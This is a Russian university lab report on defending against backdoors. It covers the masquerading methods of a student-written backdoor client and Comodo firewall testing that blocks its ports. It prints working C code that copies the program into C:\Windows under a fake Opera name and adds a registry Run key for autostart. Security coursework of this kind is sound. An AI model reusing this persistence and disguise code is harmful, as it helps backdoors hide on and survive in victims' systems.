Защита от встраиваемых потайных ходов
Автор: Verg1l • Сентябрь 27, 2022 • Лабораторная работа • 3,537 Слов (15 Страниц) • 302 Просмотры
- Министерство образования и науки Российской Федерации
- Санкт-Петербургский Политехнический Университет Петра Великого
- —
- Институт прикладной математики и механики
- Кафедра «Информационная безопасность компьютерных систем»
ЛАБОРАТОРНАЯ РАБОТА № 4
- «Защита от встраиваемых потайных ходов»
- по дисциплине «Основы информационной безопасности»
- Выполнили
- студент гр. 4851001/10002 Сергеев Н.С.
<подпись>
- Проверил
- преподаватель Калинин М.О.
<подпись>
- Санкт-Петербург 2022
- Цель работы
Приобрести навыки по анализу структуры, функциональности и угроз специально встраиваемого дефекта программного продукта – потайного хода (backdoor), а также изучить методы защиты от уязвимостей такого вида.
- Ход работы
- Использованные методы маскировки:
Для маскировки клиентская часть программы запускается без окна. Название программы похоже на название исполняемого файла одного из распространённых веб браузеров, что должно вызвать дополнительное доверие. При прописывании ключа в реестре для автозагрузки используется строка «Opera browser», что намекает на необходимость запуска.
- Описание добавления программы-клиента в автозагрузку:
Поскольку предполагается использование потайного хода на Windows-системе, клиентская программа добавляет в системный реестр ключ для автоматической загрузки вместе с системой. В исходном коде клиента это метод autoloading();. Перед этим программа копирует себя в системный каталог, и прописывает автозапуск для исполняемого файла уже из диска C. Таким образом, удаление первоначального файла не приведёт к решению проблемы.
void autoloading()
{
HKEY hKey = NULL;
char way[0x100];
GetModuleFileName(NULL, way, sizeof(way)); //извлекает полный путь доступа к исполняемому файлу
CopyFile(way, "C:\\Windows\\Opera.exe", 1); //копирует существующий файл в новый файл
LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 0, KEY_ALL_ACCESS, &hKey);
if (rc == ERROR_SUCCESS)
{
way[0] = '\0';
strcpy(way, "C:\\Windows\\Opera.exe");
RegSetValueEx(hKey, "Opera browser", NULL, REG_SZ, (LPBYTE)way, strlen(way)); //создает параметр в разделе реестра
RegCloseKey(hKey);
}
else
{
printf("Error!");
}
}
- Межсетевой экран Comodo:
Установив программный межсетевой экран “Comodo Фаервол” на атакуемый компьютер, фиксируем список открытых сетевых портов, а также отмечаем поведение межсетевого экрана на запуск клиента:
[pic 1] |
Рис. 1. Список открытых портов |
После того, как разрешаем запрос на соединение, фиксируем сетевые порты, которые ими использовались. Блокируем их и по новой производим запуск клиента и сервера. После блокировки порта соединение с сервером не было установлено.
...